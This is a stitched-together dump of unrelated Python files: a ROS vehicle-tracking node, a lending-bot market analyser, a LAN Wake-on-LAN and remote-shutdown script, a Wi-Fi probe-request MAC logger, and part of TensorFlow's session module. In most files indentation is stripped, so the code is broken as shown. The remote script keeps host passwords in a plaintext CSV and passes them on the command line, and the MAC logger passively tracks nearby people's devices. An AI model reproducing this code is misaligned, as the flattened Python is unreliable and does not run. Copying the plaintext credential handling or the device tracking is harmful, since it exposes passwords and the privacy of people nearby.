                "/home/ubuntu/duckietown/catkin_ws/src/vehicle_detection_tracking/distribution/negDist.npy").tolist()
        except IOError:
            print "Object to be detected is not introduced"
            self.introduce = True
        self.active = True
        self.bridge = CvBridge()
        self.Detector = Detector()
        # Only pass the distributions to the detector when they were loaded;
        # calling set_posterior unconditionally raised NameError after IOError.
        if not self.introduce:
            self.Detector.set_posterior(pos_dist, neg_dist)
self.Tracker = Tracker()
self.Introducer = Introducer()
self.tracking = False
self.sub_image = rospy.Subscriber("/autopilot/camera_node/image/compressed", CompressedImage, self.cbImage,
queue_size=1)
self.pub_image = rospy.Publisher("~image_with_detection", Image, queue_size=1)
self.pub_vehicle_detected = rospy.Publisher("~vehicle_detected", VehicleDetected, queue_size=1)
self.pub_vehicle_bbox = rospy.Publisher("~vehicle_bounding_box", VehicleBoundingBox, queue_size=1)
self.lock = mutex()
self.margin = 3
cv2.namedWindow("Image", cv2.WINDOW_NORMAL)
def cbImage(self, image_msg):
try:
image_cv = image_cv_from_jpg(image_msg.data)
except ValueError as e:
print 'Could not decode image: %s' % (e)
return
if not self.active:
return
thread = threading.Thread(target=self.run, args=(image_cv,))
thread.setDaemon(True)
thread.start()
def run(self, image_cv):
if self.lock.testandset():
vehicle_bounding_box_msg = VehicleBoundingBox()
vehicle_detected_msg = VehicleDetected()
image_cv = image_cv[80:200, 0:640]
if not self.tracking:
veh = self.Detector.run(image_cv)
                if veh is None:
vehicle_detected_msg = False
self.pub_vehicle_detected.publish(vehicle_detected_msg)
cv2.imshow("Image", image_cv)
cv2.waitKey(10)
else:
vehicle_detected_msg = True
vehicle_bounding_box_msg.data = veh
cv2.rectangle(image_cv, (veh[0], veh[1]), (veh[2], veh[3]), (0, 255, 0), 2)
image_msg = self.bridge.cv2_to_imgmsg(image_cv, "bgr8")
self.pub_vehicle_bbox.publish(vehicle_bounding_box_msg)
self.pub_vehicle_detected.publish(vehicle_detected_msg)
self.pub_image.publish(image_msg)
veh = [veh[0] + self.margin, veh[1] + self.margin,
veh[2] - self.margin, veh[3] - self.margin]
self.Tracker.initialize(veh, image_cv)
self.tracking = True
cv2.imshow("Image", image_cv)
cv2.waitKey(10)
else:
veh = self.Tracker.run(image_cv)
                if veh is None:
rospy.loginfo("Tracking Failed")
self.tracking = False
vehicle_detected_msg = False
self.pub_vehicle_detected.publish(vehicle_detected_msg)
cv2.imshow("Image", image_cv)
cv2.waitKey(10)
else:
veh = [veh[0] - self.margin, veh[1] - self.margin,
veh[2] + self.margin, veh[3] + self.margin]
vehicle_detected_msg = True
vehicle_bounding_box_msg.data = veh
print self.cal_distance(veh)
cv2.rectangle(image_cv, (veh[0], veh[1]), (veh[2], veh[3]), (255, 0, 0), 2)
image_msg = self.bridge.cv2_to_imgmsg(image_cv, "bgr8")
self.pub_vehicle_bbox.publish(vehicle_bounding_box_msg)
self.pub_vehicle_detected.publish(vehicle_detected_msg)
self.pub_image.publish(image_msg)
cv2.imshow("Image", image_cv)
cv2.waitKey(10)
self.lock.unlock()
def cal_distance(self, bbox):
d = 14
h = 6.5
p = 120
focal_length = (d * p) / h
height = bbox[3] - bbox[1]
distance = (h * focal_length) / height
return distance
if __name__ == "__main__":
rospy.init_node("vehicle_detection_tracking_node")
vehicle_detection_tracking_node = TLD()
rospy.spin()
|
MarketAnalysis.py
|
import csv
import threading
import time
import datetime
from cStringIO import StringIO
try:
import numpy
use_numpy = True
except ImportError as ex:
ex.message = ex.message if ex.message else str(ex)
print("WARN: Module Numpy not found, using manual percentile method instead. "
"It is recommended to install Numpy. Error: {0}".format(ex.message))
use_numpy = False
currencies_to_analyse = []
open_files = {}
max_age = 0
update_interval = 0
api = None
Data = None
lending_style = 0
def init(config, api1, data1):
global currencies_to_analyse, open_files, max_age, update_interval, api, Data, lending_style
currencies_to_analyse = config.get_currencies_list('analyseCurrencies')
max_age = int(config.get('BOT', 'analyseMaxAge', 30, 1, 365))
update_interval = int(config.get('BOT', 'analyseUpdateInterval', 60, 10, 3600))
lending_style = int(config.get('BOT', 'lendingStyle', 50, 1, 99))
api = api1
Data = data1
if len(currencies_to_analyse) != 0:
for currency in currencies_to_analyse:
try:
api.api_query("returnLoanOrders", {'currency': currency, 'limit': '5'})
except Exception as cur_ex:
print "Error: You entered an incorrect currency: '" + currency + \
"' to analyse the market of, please check your settings. Error message: " + str(cur_ex)
exit(1)
else:
path = "market_data/" + currency + "_market_data.csv"
open_files[currency] = path
thread = threading.Thread(target=update_market_loop)
    # 'daemon', not 'deamon' -- the old typo meant the thread was never daemonized.
    thread.daemon = True
thread.start()
def update_market_loop():
while True:
update_markets()
delete_old_data()
time.sleep(update_interval)
def update_markets():
for cur in open_files:
with open(open_files[cur], 'a') as f:
writer = csv.writer(f, lineterminator='\n')
raw_data = api.return_loan_orders(cur, 5)['offers'][0]
market_data = [Data.timestamp(), raw_data['rate']]
writer.writerow(market_data)
def delete_old_data():
for cur in open_files:
with open(open_files[cur], 'rb') as file_a:
new_a_buf = StringIO()
writer = csv.writer(new_a_buf)
reader2 = csv.reader(file_a)
for row in reader2:
if get_day_difference(row[0]) < max_age:
writer.writerow(row)
# At this point, the contents (new_a_buf) exist in memory
with open(open_files[cur], 'wb') as file_b:
file_b.write(new_a_buf.getvalue())
def get_day_difference(date_time): # Will be in format '%Y-%m-%d %H:%M:%S'
date1 = datetime.datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')
now = datetime.datetime.now()
diff_days = (now - date1).days
return diff_days
def get_rate_list(cur='all'):
if cur == 'all':
all_rates = {}
for cur in open_files:
with open(open_files[cur], 'r') as f:
reader = csv.reader(f)
rates = []
for row in reader:
rates.append(row[1])
rates = map(float, rates)
all_rates[cur] = rates
return all_rates
else:
if cur not in open_files:
return []
with open(open_files[cur], 'r') as f:
reader = csv.reader(f)
rates = []
for row in reader:
rates.append(row[1])
rates = map(float, rates)
return rates
def get_rate_suggestion(cur):
if cur not in open_files:
return 0
try:
rates = get_rate_list(cur)
if use_numpy:
result = numpy.percentile(rates, int(lending_style))
else:
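            # Manual nearest-rank percentile fallback: sort ascending and
            # index at lending_style percent of the list length.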
rates.sort()
index = int(lending_style * len(rates) / 100.0)
result = rates[index]
result = Data.truncate(result, 6)
return result
except Exception as exc:
print "WARN: Exception found when analysing markets, if this happens for more than a couple minutes please " \
"make a Github issue so we can fix it. Otherwise, you can safely ignore it. Error: " + str(exc)
return 0
|
remote.py
|
import os
import sys
import re
import csv
import time
import socket
import platform
import threading
import argparse
from colorama import init as color
from subprocess import run
# Console colors
color()
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
lock = threading.Lock()
def get_host_ip():
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
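        # Connecting a UDP socket sends no packets; it only makes the OS pick
        # a route, so getsockname() reports the outgoing interface address.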
sock.connect(('172.24.255.212', 80))
ip = sock.getsockname()[0]
print(f'Your host IP is {O}{ip}{W}')
return ip
def host_status(host_ip):
proc = run(['ping', host_ip, '-n', '2'],
capture_output=True, universal_newlines=True)
if 'TTL=' in proc.stdout:
active_ips.add(host_ip)
with lock:
print(f"{G}{host_ip}{W} is {O}online{W}")
def ping_ips():
start_time = time.time()
for ip in ip_list:
t = threading.Thread(target=host_status, args=(ip,), daemon=True)
t.start()
if platform.release() != "10":
while len(threading.enumerate()) >= 128:
pass
while len(threading.enumerate()) > 1 and time.time() - start_time <= 60:
pass
def create_magic_packet(macaddress):
"""
Create a magic packet.
    A magic packet is a packet that can be used with the Wake-on-LAN
    protocol to wake up a computer. The packet is constructed from the
mac address given as a parameter.
Args:
macaddress (str): the mac address that should be parsed into a
magic packet.
"""
if len(macaddress) == 17:
sep = macaddress[2]
macaddress = macaddress.replace(sep, "")
elif len(macaddress) != 12:
raise ValueError("Incorrect MAC address format")
return bytes.fromhex("F" * 12 + macaddress * 16)
def send_magic_packet(*macs, **kwargs):
"""
Wake up computers having any of the given mac addresses.
Wake on lan must be enabled on the host device.
Args:
macs (str): One or more macaddresses of machines to wake.
Keyword Args:
ip_address (str): the ip address of the host to send the magic packet
to (default "255.255.255.255")
port (int): the port of the host to send the magic packet to
(default 9)
"""
ip = kwargs.pop("ip_address", "255.255.255.255")
port = kwargs.pop("port", 9)
for k in kwargs:
raise TypeError(
"send_magic_packet() got an unexpected keyword " "argument {!r}".format(
k)
)
packets = [create_magic_packet(mac) for mac in macs]
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.connect((ip, port))
for packet in packets:
sock.send(packet)
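# Usage sketch (hypothetical MAC address):
# send_magic_packet('aa:bb:cc:dd:ee:ff')                    # broadcast, port 9
# send_magic_packet('aa:bb:cc:dd:ee:ff', ip_address='192.168.1.255', port=8384)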
class Host():
def __init__(self, host_mac, host_ip):
self.mac = host_mac
self.ip = host_ip
self.user = ""
self.passwd = ""
self.status = ""
self.model = ""
def remote_host(self, action=None, model=None, reverse=False):
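        # model is a compiled regex: with reverse=True matching hosts are
        # skipped (an exclude list); otherwise only matching hosts proceed.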
if model:
if reverse and model.search(self.model):
return
elif not reverse and not model.search(self.model):
return
if action:
# print(f'Starting remote hosts to {O}power on{W}')
self.magic_wakeon()
else:
# print(f'Starting remote hosts to {O}power off{W}')
self.remote_shutdown()
def magic_wakeon(self):
if self.status != 'ON':
# proc = run('mc-wol %s' % self.mac, capture_output=True)
send_magic_packet(self.mac, port=8384)
print(f'Send magic packet to {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W}')
return True
# print(f"The host
# {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W} is already
# {C}power on{W}")
def remote_shutdown(self):
if self.status == 'ON':
if self.user and self.passwd:
proc = run('net use \\\\%s %s /user:%s' % (
self.ip, self.passwd, self.user), capture_output=True)
if proc.returncode != 0:
print(f'{R}Fail{W} to remote host {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W}')
return
proc = run('shutdown /m \\\\%s /s /f /t 0' %
self.ip, capture_output=True)
if proc.returncode != 0:
print(f'{R}Fail{W} to power off {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W}')
return
print(f'{G}Success{W} to power off {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W}')
self.status = 'OFF'
return True
# print(f"The host
# {G}{self.ip}{W}<==>{O}{self.mac}{W}<==>{C}{self.model}{W} is
# already {C}power off{W}")
def update_hosts():
hosts = {}
if os.path.exists(csv_file):
print(f'Starting update hosts from {O}{csv_file}{W} file')
with open(csv_file) as f:
csv_reader = csv.DictReader(f)
for host in csv_reader:
hosts[host['MAC']] = Host(host['MAC'], host['IP'])
hosts[host['MAC']].user = host['USER']
hosts[host['MAC']].passwd = host['PASSWORD']
hosts[host['MAC']].model = host['MODEL']
proc = run(['arp', '-a'], capture_output=True, universal_newlines=True)
for result in proc.stdout.split('\n'):
result = result.split()
if result and result[0] in active_ips:
host_mac = result[1].replace('-', ':')
host_ip = result[0]
if host_mac not in hosts:
hosts[host_mac] = Host(host_mac, host_ip)
else:
hosts[host_mac].mac = host_mac
hosts[host_mac].ip = host_ip
hosts[host_mac].status = 'ON'
host_list = list(hosts.values())
host_list.sort(key=lambda x: int(x.ip.split('.')[-1]))
return host_list
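# Note: the arp parsing above assumes the Windows `arp -a` table layout, where
# each entry line looks roughly like (values hypothetical):
#   192.168.1.10          aa-bb-cc-dd-ee-ff     dynamic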
def update_csv(host_list):
print(f'Starting update hosts to {O}{csv_file}{W} file')
with open(csv_file, 'w', newline='') as f:
csv_writer = csv.DictWriter(
f, fieldnames=['IP', 'MAC', 'USER', 'PASSWORD', 'STATUS', 'MODEL'])
csv_writer.writeheader()
for host in host_list:
csv_writer.writerow({
'MAC': host.mac,
'IP': host.ip,
'USER': host.user,
'PASSWORD': host.passwd,
'STATUS': host.status,
'MODEL': host.model
})
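# The CSV written above (and read back by update_hosts) has this shape; the
# row values are made up for illustration:
#   IP,MAC,USER,PASSWORD,STATUS,MODEL
#   192.168.1.10,aa:bb:cc:dd:ee:ff,admin,secret,ON,OptiPlex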
def arg_parser():
parser = argparse.ArgumentParser(
description='a simple script use to remote hosts to power on or off')
group1 = parser.add_mutually_exclusive_group()
    group1.add_argument('-on', '--on', action='store_true',
                        help='remotely power on the target hosts')
    group1.add_argument('-off', '--off', action='store_true',
                        help='remotely power off the target hosts')
    group2 = parser.add_mutually_exclusive_group()
    group2.add_argument('--include', action='store', nargs='+', metavar='MODEL',
                        help='only operate on hosts whose model matches any of the given models')
    group2.add_argument('--exclude', action='store', nargs='+', metavar='MODEL',
                        help='skip hosts whose model matches any of the given models')
    parser.add_argument(
        "--mac",
        metavar="MAC",
        nargs="+",
        help="MAC address(es) of the hosts to wake; more than one may be given"
    )
parser.add_argument(
"-i",
metavar="ip",
default="255.255.255.255",
help="The ip address of the host to send the magic packet to "
"(default 255.255.255.255)."
)
parser.add_argument(
"-p",
metavar="port",
type=int,
default=9,
help="The port of the host to send the magic packet to "
"(default 9)."
)
return parser
if __name__ == '__main__':
parser = arg_parser()
args = parser.parse_args()
# if platform.release() != "10":
# W = R = G = B = O = P = C = GR = ""
os.system('cls')
if args.mac:
send_magic_packet(*args.mac, ip_address=args.i, port=args.p)
sys.exit(f"Send magic packet to {O}{' '.join(args.mac)}{W}")
active_ips = set()
    ip_header = '.'.join(get_host_ip().split('.')[:3])
csv_file = ip_header.replace('.', '_') + '.csv'
ip_list = ['%s.%s' % (ip_header, x) for x in range(1, 255)]
try:
ping_ips()
hosts = update_hosts()
model = ""
reverse = False
if args.on:
print(f'Starting remote hosts to {O}power on{W}')
if args.include:
print(f"The select model is {O}{' '.join(args.include)}{W}")
model = re.compile('|'.join(args.include), re.I)
elif args.exclude:
print(f"The unselect model is {O}{' '.join(args.exclude)}{W}")
model = re.compile('|'.join(args.exclude), re.I)
reverse = True
for host in hosts:
host.remote_host(action=True, model=model, reverse=reverse)
elif args.off:
print(f'Starting remote hosts to {O}power off{W}')
if args.include:
print(f"The select model is {O}{' '.join(args.include)}{W}")
model = re.compile('|'.join(args.include), re.I)
elif args.exclude:
print(f"The unselect model is {O}{' '.join(args.exclude)}{W}")
model = re.compile('|'.join(args.exclude), re.I)
reverse = True
for host in hosts:
host.remote_host(model=model, reverse=reverse)
update_csv(hosts)
except KeyboardInterrupt:
sys.exit()
except Exception as e:
sys.exit(e)
|
main.py
|
import os
import json
import codecs
import datetime as dt
import serial
import urllib.request as urllib2
import matplotlib.pyplot as plt
from threading import Thread
# Read MACs from the serial port (RSSI is ignored); for each MAC, look it up
# in dev_dict: update the entry if it exists, otherwise add a new one.
dev_dict={}
mnf_list=[]
def get_manufacture(mac_address):
    try:
        url = "http://macvendors.co/api/"
        request = urllib2.Request(url + mac_address,
                                  headers={'User-Agent': "API Browser"})
        response = urllib2.urlopen(request)
        # json.load() needs str, not bytes, so decode through a utf-8 reader.
        reader = codecs.getreader("utf-8")
        obj = json.load(reader(response))
        mnf_list.append([mac_address, obj['result']['company']])
    except Exception:
        # TODO: ignore MACs without a known manufacturer
        mnf_list.append([mac_address, "FAILED"])
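# get_manufacture() assumes the macvendors.co response is JSON shaped like
# {"result": {"company": "<vendor name>"}}; anything else lands in the except
# branch and is recorded as "FAILED".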
def wifiinfo_handler(imac):
    cHour = dt.datetime.now().strftime('%H')
    cMin = dt.datetime.now().strftime('%M')
    if imac in dev_dict:
        # Known MAC: plot a new point on its existing row.
        plt.scatter(int(cHour) + int(cMin) / 60, dev_dict[imac])
        plt.pause(0.01)
    else:
        # New MAC: assign it a row, plot the first point, and label the row.
        index = len(dev_dict) * 5
        dev_dict[imac] = index
        plt.scatter(int(cHour) + int(cMin) / 60, dev_dict[imac])
        plt.text(0.5, dev_dict[imac] - 1, imac)
        plt.pause(0.01)
        t = Thread(target=get_manufacture, args=(imac,))
        t.start()
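# Judging by the parsing below, the serial payload is assumed to be a JSON
# document of the form:
#   {"probes": [{"address": "aa:bb:cc:dd:ee:ff", "rssi": -42}, ...]}
# possibly split across several reads, which is why fragments are accumulated
# in str0 until the closing "]}" arrives.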
#--------------------------main-----------------------------
plt.axis([0, 24, 0, 100])
plt.ion()
try:
portx="COM5"
bps=115200
timex=5
ser=serial.Serial(portx,bps,timeout=timex)
result=ser.write("I am jack".encode("gbk"))
    while True:
        if ser.in_waiting:
            data = ser.read(ser.in_waiting).decode("gbk")
            if data == "exit":
                break
            else:
                if data[2:8] == "probes" and data[-4:-2] == "]}":
                    print("blank")
                    continue
                if data[2:8] == "probes":
                    str0 = data
                elif data[-4:-2] == "]}":
                    str0 = str0 + data
                    # str0 now holds a complete JSON document.
                    json_str = json.loads(str0)
                    # Hand each MAC to the handler, skipping consecutive
                    # duplicates and weak signals (RSSI <= -50).
                    print('--------------------------')
                    old = ''
                    for i in range(len(json_str['probes'])):
                        if (json_str['probes'][i]['address'] != old
                                and json_str['probes'][i]['rssi'] > -50):
                            wifiinfo_handler(json_str['probes'][i]['address'])
                            old = json_str['probes'][i]['address']
                            print(old)
                else:
                    str0 = str0 + data
        if len(mnf_list) > 0:
            # Annotate the row with the vendor looked up in the background.
            plt.text(7, dev_dict[mnf_list[0][0]] - 1, mnf_list[0][1])
            mnf_list.pop()
            print("---------------")
    ser.close()
except Exception as e:
print("---异常---:",e)
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import re
import threading
import warnings
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow as tf_session
from tensorflow.python.eager import context
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
raise ValueError('%s has already been registered so ignore it.' %
tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = {}
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(f)
if j is None:
j = len(seen_fetches)
seen_fetches[f] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
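# For example, two mappers whose unique fetches are [a, b] and [b, c] yield
# unique_fetches == [a, b, c] and value_indices == [[0, 1], [1, 2]]: the
# shared fetch b is deduplicated, and both mappers refer to it via index 1.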
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = self._fetch_type()
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
results[k] = m.build_results([values[j] for j in vi])
return results
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
